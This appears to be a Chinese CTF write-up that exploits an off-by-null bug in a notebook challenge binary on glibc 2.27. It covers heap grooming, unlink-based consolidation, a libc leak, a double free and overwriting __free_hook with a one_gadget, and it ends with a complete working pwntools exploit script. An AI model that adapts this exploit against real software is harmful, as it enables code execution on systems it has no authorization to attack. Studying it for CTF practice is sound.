libc2.27下off-by-null的利用

1

2

在edit功能里有个off-by-null,libc版本是2.27

2.27下off-by-null基本是配合利用unlink,但是这里的我们能控制的chunk中间夹了一个管理堆块

3

所以首先我们需要先布置堆风水让我们控制的chunk挨在一块

1
2
3
4
5
6
7
8
9
10
11
add('0',0x10,'0')
add('1',0x10,'1')
free(0)

add('0',0x420,'0') # 0    
add('2',0x28,'2') # 2
free(1) 

add('1',0x4f0,'1') # 1
add('3', 0x10, '3') # 3
free(0)

5

现在去编辑chunk2去修改chunk1的presize,且覆盖一字节0,然后去释放1触发unlink,申请0x420的chunk,此时管理堆块2的fd指针就指向了libc地址

1
2
3
4
5
6
7
edit(2,b'a'*(0x20)+p64(0x4f0))
free(1)
add('0',0x420,'0') # 0    

show(2)
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 -0x10 -libc.sym['__malloc_hook']
success('libc_base =========================>'+hex(libc_base))

接下来申请一个0x28的chunk也就是chunk2,但是这次申请的chunk下标为1,也就是此时1和2指向了同一块地址,分别释放,就造成了double free

1
2
3
add('1',0x28,'1') # 1
free(2)
free(1)

6

1
2
3
4
5
add('1',0x28,p64(libc_base + libc.sym['__free_hook'])) # 1
add('2',0x28,'2') # 2
add('4',0x28,p64(one[1]+libc_base)) # 4

free(3)

改free_hook即可

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
# -*- coding: utf-8 -*-
from pwn import *
context(os = 'linux', arch = 'amd64', log_level = 'debug')
#io = remote('node4.buuoj.cn',25939)
io = process('./2018_.bin')
elf = ELF('./2018_.bin')
libc = elf.libc
one = [0x4f2c5,0x4f322,0xe569f,0xe5858,0xe585f,0xe5863,0x10a398,0x10a38c]
def add(name,size,content):
	io.sendlineafter(b'>',b'1')
	io.sendlineafter(b'please enter the name of the notebook:',name)
	io.sendlineafter(b'please enter the length of the content:',str(size).encode())
	io.sendlineafter(b'please enter the content:',content)

def edit(index,content):
	io.sendlineafter(b'>',b'2')
	io.sendlineafter(b'please enter the notebook id to edit:',str(index))
	io.sendlineafter(b'please enter the content of the notebook:',content)

def show(index):
	io.sendlineafter(b'>',b'3')
	io.sendlineafter(b'please enter the notebook id to show:',str(index))

def free(index):
	io.sendlineafter(b'>',b'4')
	io.sendlineafter(b'please enter the notebook id to delete:',str(index))


add('0',0x10,'0')
add('1',0x10,'1')
free(0)

add('0',0x420,'0') # 0    
add('2',0x28,'2') # 2
free(1) 

add('1',0x4f0,'1') # 1
add('3', 0x10, '3') # 3
free(0)


edit(2,b'a'*(0x20)+p64(0x4f0))
free(1)
add('0',0x420,'0') # 0    

show(2)
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 96 -0x10 -libc.sym['__malloc_hook']
success('libc_base =========================>'+hex(libc_base))

add('1',0x28,'1') # 1
free(2)
free(1)

add('1',0x28,p64(libc_base + libc.sym['__free_hook'])) # 1
add('2',0x28,'2') # 2
add('4',0x28,p64(one[1]+libc_base)) # 4

free(3)



io.interactive()

7